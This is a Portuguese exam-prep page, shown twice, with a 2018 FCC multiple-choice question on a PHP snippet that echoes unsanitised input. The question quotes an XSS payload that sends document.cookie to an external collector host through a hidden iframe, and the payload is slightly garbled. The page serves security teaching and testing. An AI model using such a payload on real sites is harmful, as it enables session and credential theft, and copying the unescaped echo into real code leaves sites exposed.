Considere o trecho de programa PHP abaixo.<?php setcookie('PHPSSESI...

Q: Considere o trecho de programa PHP abaixo. Supondo que ao executar este

A) trata-se de um ataque do tipo SQL-Injection, pois o usuário invasor inseriu uma consulta que será enviada diretamente para o banco de dados relacional. | B) o navegador, ao perceber que a entrada se trata de um script, encerrará o código sem executar o echo. | C) o trecho com a instrução echo imprime os dados passados pelo usuário, sem oferecer vulnerabilidades ao site alvo. | D) nada ocorrerá, pois o usuário não poderia passar a entrada indicada. | E) trata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.

Question 1

Considere o trecho de programa PHP abaixo.<?php setcookie('PHPSSESI...

📅 2018🏢 FCC🎯 TRT - 2ª REGIÃO (SP)📚 Linguagens de Programação

#Linguagens de Programação#PHP

Esta questão foi aplicada no ano de 2018 pela banca FCC no concurso para TRT - 2ª REGIÃO (SP). A questão aborda conhecimentos da disciplina de Linguagens de Programação, especificamente sobre Linguagens de Programação, PHP.

Esta é uma questão de múltipla escolha com 5 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201196125

Ano: 2018Banca: FCCOrganização: TRT - 2ª REGIÃO (SP)Disciplina: Linguagens de ProgramaçãoTemas: Linguagens de Programação | PHP

Considere o trecho de programa PHP abaixo.

<?php

setcookie('PHPSSESID', 'meu_sid');

setcookie('login', 'meu_login');

setcookie('senha', 'minha_senha');

echo $_GET['var'];

?>

Supondo que ao executar este trecho, um usuário passou como entrada:

document.write('<iframe width=1 height=1

src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')

</script>

cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com

Um Técnico de TI conclui corretamente que

A

B

C

D

E

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200014810Linguagens de Programação

Do pacote java.lang, é interface de objetos que recebem caracteres ou sequência de caracteres, como anexos, o

#Linguagens de Programação#Java

Questão 457941200882510Linguagens de Programação

Analise as definições abaixo referentes ao Tomcat. I. O Web Application Deployment Descriptor é um arquivo XML que descreve as servlets e outros compo...

#Servidores de Aplicação#Desenvolvimento Web#Apache Tomcat

Questão 457941201434348Linguagens de Programação

Fornece e determina a visão que o programador possui sobre a estruturação e execução do programa. Trata-se

#Fundamentos de Programação

Questão 457941201449887Linguagens de Programação

Em um site desenvolvido com recursos Java EE, um formulário passa o valor digitado no campo salário como parâmetro para uma servlet. Para receber o pa...

#Java Platform#Jakarta EE

Questão 457941201529689Linguagens de Programação

A arquitetura da plataforma JAVA EE provê uma clara divisão tanto lógica quanto física de aplicações em camadas. Aplicações Java EE distribuídas são c...

#Java Platform#Jakarta EE

Questão 457941201753460Linguagens de Programação

Em uma aplicação que utiliza JPA e Hibernate, no arquivo persistence.xml

#Hibernate ORM#Java Frameworks

Question 2

Considere o trecho de programa PHP abaixo.<?php setcookie('PHPSSESI...

📅 2018🏢 FCC🎯 TRT - 2ª REGIÃO (SP)📚 Linguagens de Programação

#Linguagens de Programação#PHP

Esta questão foi aplicada no ano de 2018 pela banca FCC no concurso para TRT - 2ª REGIÃO (SP). A questão aborda conhecimentos da disciplina de Linguagens de Programação, especificamente sobre Linguagens de Programação, PHP.

Esta é uma questão de múltipla escolha com 5 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201196125

Ano: 2018Banca: FCCOrganização: TRT - 2ª REGIÃO (SP)Disciplina: Linguagens de ProgramaçãoTemas: Linguagens de Programação | PHP

Considere o trecho de programa PHP abaixo.

<?php

setcookie('PHPSSESID', 'meu_sid');

setcookie('login', 'meu_login');

setcookie('senha', 'minha_senha');

echo $_GET['var'];

?>

Supondo que ao executar este trecho, um usuário passou como entrada:

document.write('<iframe width=1 height=1

src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')

</script>

cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com

Um Técnico de TI conclui corretamente que

A

B

C

D

E

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200014810Linguagens de Programação

Do pacote java.lang, é interface de objetos que recebem caracteres ou sequência de caracteres, como anexos, o

#Linguagens de Programação#Java

Questão 457941200882510Linguagens de Programação

Analise as definições abaixo referentes ao Tomcat. I. O Web Application Deployment Descriptor é um arquivo XML que descreve as servlets e outros compo...

#Servidores de Aplicação#Desenvolvimento Web#Apache Tomcat

Questão 457941201434348Linguagens de Programação

Fornece e determina a visão que o programador possui sobre a estruturação e execução do programa. Trata-se

#Fundamentos de Programação

Questão 457941201449887Linguagens de Programação

Em um site desenvolvido com recursos Java EE, um formulário passa o valor digitado no campo salário como parâmetro para uma servlet. Para receber o pa...

#Java Platform#Jakarta EE

Questão 457941201529689Linguagens de Programação

A arquitetura da plataforma JAVA EE provê uma clara divisão tanto lógica quanto física de aplicações em camadas. Aplicações Java EE distribuídas são c...

#Java Platform#Jakarta EE

Questão 457941201753460Linguagens de Programação

Em uma aplicação que utiliza JPA e Hibernate, no arquivo persistence.xml

#Hibernate ORM#Java Frameworks